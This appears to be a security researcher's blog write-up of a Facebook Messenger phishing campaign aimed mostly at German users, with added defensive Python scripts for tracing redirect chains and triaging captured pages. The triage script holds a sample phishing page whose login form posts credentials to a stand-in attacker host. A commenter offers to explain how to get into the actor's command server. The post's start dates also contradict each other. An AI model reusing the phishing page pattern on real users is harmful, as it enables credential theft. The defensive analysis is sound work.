We uncovered a Facebook phishing campaign that tricked nearly 500,000 users in two weeks


Our investigation into a malicious Facebook Messenger message uncovered a large-scale phishing operation on Facebook. We also potentially identified the threat actor behind the phishing campaign and his intentions.

“Is that you” is a phishing scam that has been circulating on Facebook in various forms since at least 2017. It begins with a Facebook message from one of your friends, whose account has already been compromised. The “friend” claims to have found a video or image with you in it.

The message masquerades as a video that, when clicked, leads you through a chain of websites hosting malicious scripts.


These scripts fingerprint your location, device and operating system. They then send you to a fake Facebook login page that harvests your credentials and, depending on your device, on to adware or other malware.

Close to 500,000 victims

At the time of writing this report on February 8, the number of potential victims exceeded 480,000 since the phishing campaign began on January 26, 2020, with 77% of the victims being based in Germany.

Based on the large-scale nature of the campaign and the fact that it appears to predominantly target users in Germany, we shared our report with CERT Germany, Facebook, and wal.ee (the URL shortener service used by the threat actor). We also informed the Dominican Republic’s cyber police about the incident.

That being said, it wasn’t immediately clear whether the threat actor behind the phishing operation was using the compromised Facebook accounts for any malicious purpose other than to simply spread the phishing campaign through the victims’ Messenger contacts.

Interestingly, however, the threat actor was using a legitimate third-party web statistics service to track the campaign, which helped us conduct our investigation and find out the start date of the campaign, the number of affected users, and more useful information.


How the phishing campaign works

The message

The campaign starts with a message sent to the potential victim from one of their Facebook contacts. It contains what appears to be a video link, captioned in German with the question “Is that you?”. The lure appears to use Facebook’s Open Graph meta tags to shape the link preview: the tags make the link render as a video and work the recipient’s name into the preview.

After clicking the malicious link, the victim is redirected to a fake Facebook phishing page.

The “legitimate” phishing page

Interestingly, the script that redirects the victim to the phishing page is hidden on what appears to be a compromised legitimate website:

http://108xxxxxxx.rsc.cdn77.org/Uploaded/Content/26d0ba85d866423db3d591c9835d72ef/saliendopadentro.xml

The website itself appears to be legitimate, but a malicious XML file has been planted among its content.


The file contains a small script that redirects the browser to a short URL, which in turn leads the victim to the phishing page. Hosting the redirect on a legitimate website makes the attack more effective: the link Facebook scans points at a domain with a clean reputation, so domain blocklists miss it, and the short URL adds another hop that hides the final destination from anyone who only looks at the planted file.
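To see what such a chain looks like when walked hop by hop, here is an added Python tracer. It is example code written for this page, not the campaign’s scripts or the investigators’ tooling. It follows HTTP 3xx, meta-refresh and simple `location = …` script redirects without executing JavaScript, tries the same start URL with a desktop and a mobile User-Agent, and records every host on the way. The chain it walks (cdn.example, short.example, fb-login.example, offers.example, and the decision to branch on User-Agent at the shortener) is a constructed stand-in, not the campaign’s real infrastructure; `live_fetch` is included for pointing the same tracer at a real URL from an isolated analysis host.

```python
import re
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlsplit

META_REFRESH_RE = re.compile(r"""http-equiv=["']refresh["'][^>]*url=["']?([^"'>\s]+)""", re.IGNORECASE)
# Simple "location = ..." style redirects; enough for lure pages, not a JS engine.
JS_REDIRECT_RE = re.compile(r"""location(?:\.href\s*=|\.replace\s*\(|\s*=)\s*["']([^"']+)["']""")


def fake_fetch(url, user_agent):
    """Constructed offline stand-in for the chain: a planted file on a reputable host,
    a short URL that branches on User-Agent, and two final pages. All hosts and the
    branch point are assumptions for this example."""
    mobile = "Android" in user_agent or "iPhone" in user_agent
    site = {
        "https://cdn.example/Uploaded/Content/lure.xml":
            (200, {}, '<html><script>location.replace("https://short.example/xyz")</script></html>'),
        "https://short.example/xyz":
            (302, {"Location": "/go?m=1" if mobile else "https://fb-login.example/login"}, ""),
        "https://short.example/go?m=1":
            (200, {}, '<meta http-equiv="refresh" content="0;url=https://offers.example/app">'),
        "https://fb-login.example/login": (200, {}, "<html><form>fake login</form></html>"),
        "https://offers.example/app": (200, {}, "<html>install our app</html>"),
    }
    return site.get(url, (404, {}, ""))


def live_fetch(url, user_agent, timeout=10):
    """Fetch one hop without following redirects (swap in for fake_fetch on real URLs)."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with urllib.request.build_opener(NoRedirect).open(req, timeout=timeout) as resp:
            return resp.getcode(), dict(resp.headers), resp.read(65536).decode("utf-8", "replace")
    except urllib.error.HTTPError as err:  # 3xx surfaces here once redirects are disabled
        return err.code, dict(err.headers), err.read(65536).decode("utf-8", "replace")


def next_hop(url, status, headers, body):
    """Return (next_url, how) for one response, or (None, 'final') if it does not redirect."""
    loc = {k.lower(): v for k, v in headers.items()}.get("location")
    if 300 <= status < 400 and loc:
        return urljoin(url, loc), f"http {status}"
    m = META_REFRESH_RE.search(body)
    if m:
        return urljoin(url, m.group(1)), "meta refresh"
    m = JS_REDIRECT_RE.search(body)
    if m:
        return urljoin(url, m.group(1)), "script"
    return None, "final"


def trace_chain(start, user_agent, fetch=fake_fetch, max_hops=10):
    """Walk HTTP, meta-refresh and script redirects from start; return [(url, how), ...]."""
    hops, seen, url = [], set(), start
    while url and len(hops) < max_hops:
        if url in seen:
            hops.append((url, "loop"))
            break
        seen.add(url)
        cur = url
        status, headers, body = fetch(cur, user_agent)
        url, how = next_hop(cur, status, headers, body)
        hops.append((cur, how))
    return hops


def hosts_in(hops):
    """Distinct hosts of a chain, in order: the list to block or report."""
    out = []
    for url, _ in hops:
        h = urlsplit(url).hostname
        if h and h not in out:
            out.append(h)
    return out


DESKTOP_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/85.0"
MOBILE_UA = "Mozilla/5.0 (Linux; Android 10) Mobile Chrome/88.0"

if __name__ == "__main__":
    start = "https://cdn.example/Uploaded/Content/lure.xml"
    for label, ua in (("desktop", DESKTOP_UA), ("mobile", MOBILE_UA)):
        chain = trace_chain(start, ua)
        print(label, " -> ".join(f"{u} [{how}]" for u, how in chain))
        print("  hosts:", hosts_in(chain))
```

Because the tracer does not run JavaScript, a branch taken inside the page by a fingerprinting script (as the campaign’s scripts do) will not show up; for that, the page body at the hop where the chain stops has to be read by hand or loaded in an instrumented browser. Running `live_fetch` against real lures makes requests to attacker infrastructure, so do it only from a host and network you are willing to expose.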

How we uncovered the threat actor behind the campaign

As we investigated the phishing page, we found that it is a single HTML document with Open Graph metadata and with its images embedded inline as Base64 data URIs rather than fetched from a server, which keeps the page self-contained and leaves no image requests for a filter to block.

To our surprise, the page carries an author credit. Translated from Spanish, it reads:

Developed by
BenderCrack.com

The domain mentioned in the signature no longer exists. However, upon further investigation, we discovered a Facebook page that could be connected to the creator of the malicious script:


Meanwhile, the original phishing page also includes a script designed to harvest credentials entered by the victims and collect their location data:

[Image: the script designed to harvest credentials]

The malicious scripts are hosted on the threat actor’s private server:

https://lapirixxx.xyz

We also found tracking code from a legitimate third-party web statistics service embedded in the phishing page.

The snippet carries the account identifier under which the threat actor registered the campaign. With that identifier we were able to open the threat actor’s statistics dashboard and determine the scale of the campaign.

It appears that since the start of the malicious campaign, a total of more than 480,000 users have ended up clicking the phishing link. Since we had access to the threat actor’s dashboard, we were able to identify the devices and browsers predominantly used by the affected users.

[Image: diagram of the operating systems most affected by the Facebook phishing campaign]
[Image: diagram of the browsers most affected by the Facebook phishing campaign]
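As an added example of the static checks described above (the Open Graph preview, the inline Base64 images, the Spanish author credit, the credential-harvesting form and the third-party tracker identifier), here is a Python triage script for a captured phishing page. It is written for this page and is not the campaign’s code or the investigators’ tooling; the sample HTML, every host name in it and the tracker id 4711 are constructed for the example.

```python
import base64
import re
import urllib.parse
from html.parser import HTMLParser

# Constructed sample of a captured phishing landing page. Every host name, the
# tracker id 4711 and the tag values are assumptions made for this example.
SAMPLE_PAGE = """<!doctype html>
<html><head>
<meta property="og:type" content="video.other">
<meta property="og:title" content="Bist du das?">
<meta property="og:image" content="https://cdn.example/preview.jpg">
<meta property="og:url" content="https://short.example/xyz">
<title>Facebook - Log In or Sign Up</title>
</head><body>
<!-- Desarrollado por BenderCrack.com -->
<img src="data:image/png;base64,iVBORw0KGgo=">
<form method="post" action="https://phish-backend.example/login.php"><input name="pass"></form>
<script src="https://stats.example/counter.js?id=4711"></script>
<script>setTimeout(function(){window.location.href="https://short.example/xyz";},1500);</script>
</body></html>"""

# Simple "location = ..." style redirects; enough for lure pages, not a JS engine.
REDIRECT_RE = re.compile(r"""location(?:\.href\s*=|\.replace\s*\(|\s*=)\s*["']([^"']+)["']""")
TRACKER_ID_RE = re.compile(r"[?&](?:id|uid|account)=([A-Za-z0-9_-]+)")
SIGNATURE_RE = re.compile(r"desarrollado por", re.IGNORECASE)  # Spanish: "developed by"
MAGIC = {b"\x89PNG": "png", b"\xff\xd8\xff": "jpeg", b"GIF8": "gif"}


class PhishPageParser(HTMLParser):
    """Collects the parts of a page that matter for phishing triage."""
    def __init__(self):
        super().__init__()
        self.og, self.data_uris, self.form_actions = {}, [], []
        self.external_scripts, self.inline_scripts, self.comments = [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "meta" and a.get("property", "").startswith("og:"):
            self.og[a["property"]] = a.get("content", "")
        elif tag == "img" and a.get("src", "").startswith("data:image/"):
            self.data_uris.append(a["src"])
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        elif tag == "script":
            if a.get("src"):
                self.external_scripts.append(a["src"])
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline_scripts.append(data)

    def handle_comment(self, data):
        self.comments.append(data.strip())


def host_of(url):
    return (urllib.parse.urlsplit(url).hostname or "").lower()


def image_kind(data_uri):
    """Decode an inline data: image and identify it by its magic bytes."""
    try:
        raw = base64.b64decode(data_uri.split(",", 1)[1], validate=True)
    except (IndexError, ValueError):
        return "undecodable"
    return next((k for m, k in MAGIC.items() if raw.startswith(m)), "unknown")


def triage(html, page_host):
    """Static triage of a captured phishing page that was served from page_host."""
    p = PhishPageParser()
    p.feed(html)
    redirects = [m.group(1) for s in p.inline_scripts for m in REDIRECT_RE.finditer(s)]
    tracker_ids = [m.group(1) for u in p.external_scripts for m in TRACKER_ID_RE.finditer(u)]
    signatures = [c for c in p.comments if SIGNATURE_RE.search(c)]
    form_hosts = [host_of(a) for a in p.form_actions]
    findings = []
    if p.og.get("og:type", "").startswith("video") and not p.og.get("og:video"):
        findings.append("og:type claims a video but no og:video is declared: the preview is a lure, not media")
    og_host = host_of(p.og.get("og:url", ""))
    if og_host and og_host != page_host:
        findings.append(f"og:url advertises {og_host}, not the page itself")
    for h in form_hosts:
        if h and h != page_host:
            findings.append(f"login form posts credentials to third-party host {h}")
    if p.data_uris:
        findings.append(f"{len(p.data_uris)} inline base64 image(s): no image fetches for a proxy to log or block")
    return {"og": p.og, "image_kinds": [image_kind(d) for d in p.data_uris],
            "form_hosts": form_hosts, "redirects": redirects, "tracker_ids": tracker_ids,
            "signatures": signatures, "findings": findings}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_PAGE, "fb-login.example").items():
        print(f"{key}: {value}")
```

The form action host and the tracker id are the two outputs worth acting on: the first is the server that receives the stolen credentials (on this page, the actor’s own server), the second is the handle under which the stats service keeps the campaign counters.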

We were also able to identify and correlate other, potentially malicious activities that we traced to the same threat actor.

In the tracking dashboard the Facebook phishing campaign is labelled Tamo Trabajando, colloquial Spanish for “we’re working.”

The motive

Even though Facebook has a rigorous system of checks to stop the spread of malware and malicious links, these types of campaigns are sophisticated enough to at least temporarily bypass those measures.

It’s clear that the “Is that you” phishing campaign was targeting German residents in order to harvest their credentials. What was not immediately clear, however, is whether the mass abuse of breached Facebook accounts was perpetrated in order to do anything else besides spreading the campaign.

What could point to the threat actor’s further motives, however, is the fact that after having their credentials harvested, the victim was redirected to a malicious website that served them either adware or malware.

The threat actor’s other campaign, Blacksar Inc., appears to be associated with additional malicious websites and malware campaigns. The code also contains more Spanish, such as the file name saliendopadentro.xml and the credit Desarrollado por (“developed by”).


One of the malicious Blacksar domains was registered from the Dominican Republic, which strongly suggests that the threat actor is from a Spanish-speaking country or even the Dominican Republic itself.

[Image: domain registration record]

One interesting campaign and tracking code was LA PARITA, which tracked a particular personal Facebook profile and its visitors. That person seemed to be based in the Dominican Republic.

At this point, we have sent our report, our open-source intelligence, and all the remaining details we gathered during our analysis to the Computer Emergency Response Teams (CERTs) in Germany and the Dominican Republic.

Steps we’ve taken to mitigate the threat

  • We have reported the phishing campaign with the relevant information to Facebook to help stop the spread of the campaign on the social media platform.
  • We have informed the wal.ee link-shortening service so that it disables the short URL that redirects to the malicious Facebook phishing page. At the time of publishing they had taken the malicious link down.
  • We have sent all the relevant information and evidence from our investigation to CERT Germany since it is evident that the campaign primarily targets German citizens.
  • We have sent the relevant information to Dominican CERT, as some artefacts and evidence point that the campaign was launched from there.
  • We have informed the website compromised by the threat actor that it serves malicious scripts.

How to protect yourself against phishers

  • Use unique and complex passwords for all of your online accounts. Password managers help you easily create strong passwords and notify you of password reuse.
  • Use multi-factor authentication where possible. Note that a phishing page that relays your login to the real site in real time can relay a one-time code as well, so a hardware security key, which is bound to the genuine site’s domain, is the most robust option.
  • Treat unexpected messages with suspicion, even when they come from your contacts, and check the address bar before entering credentials: a login page that is not on facebook.com is not Facebook. Phishing attacks usually employ some form of social engineering to lure users into clicking malicious links or downloading infected files.
  • Be mindful of any suspicious activity on your Facebook or other accounts.


Comments

John
3 years ago
I saw this back in October 2020 – this is just another variant of the same phishing scam.
Mantas Sasnauskas
3 years ago
Hi John. Correct, as mentioned in the article, it is just one of the many variants. And you are correct, we can see that the scam started around October 2020. We are continuing to investigate the whole scam with more details and how widespread it is. We will have an update on it in due time.
Toto
3 years ago
Interesting, but why is it not advised that users check the url of a website demanding credentials?
If a page claiming to be Facebook has an url like whatever.com, isn’t it easy to notice it and know that something is wrong?
Aidan Raney
3 years ago
I actually investigated this same campaign a few months ago after a friend got hacked from it. I have some additional information and I spoke with the creator of the tool they use as well. I gained access to one of their command and control servers while researching it and I can show you how to do this for your own research. Please contact me so I can send these details.
Mantas Sasnauskas
3 years ago
Hi Aidan. Thank you for commenting. That is very interesting, I’ve emailed you.
John Doe
3 years ago
Spanish words are misspelled; this might be a spoof account. I don’t think the Dominican Republic can afford the level of sophistication.
Mantas Sasnauskas
3 years ago
Yes, Spanish words do not necessarily prove anything, but with all the other artefacts we managed to find, they do point that way.